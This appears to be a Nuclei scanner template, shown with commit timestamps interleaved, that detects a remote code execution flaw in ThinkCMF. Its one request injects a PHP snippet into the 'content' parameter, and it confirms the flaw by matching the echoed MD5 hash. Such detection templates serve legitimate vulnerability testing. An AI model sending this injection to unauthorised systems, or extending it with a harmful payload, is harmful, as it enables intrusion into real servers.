2021-03-24 01:10:20 +00:00
id : thinkcmf-arbitrary-code-execution
info :
2022-10-10 19:22:59 +00:00
name : ThinkCMF - Remote Code Execution
2021-03-24 01:10:20 +00:00
author : pikpikcu
severity : high
2022-10-10 19:22:59 +00:00
description : ThinkCMF is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2022-04-22 10:38:41 +00:00
reference :
- https://www.shuzhiduo.com/A/l1dygr36Je/
2022-09-01 20:08:27 +00:00
tags : thinkcmf,rce
2021-03-24 01:10:20 +00:00
requests :
- method : GET
path :
2022-09-01 20:08:27 +00:00
- "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF');"
2021-03-24 01:10:20 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-09-01 20:08:27 +00:00
- "d9b2c63a497e2f30c4ad9ad083a00691"
2021-03-24 01:10:20 +00:00
- type : status
status :
- 200
2022-10-10 19:22:59 +00:00
# Enhanced by md on 2022/10/05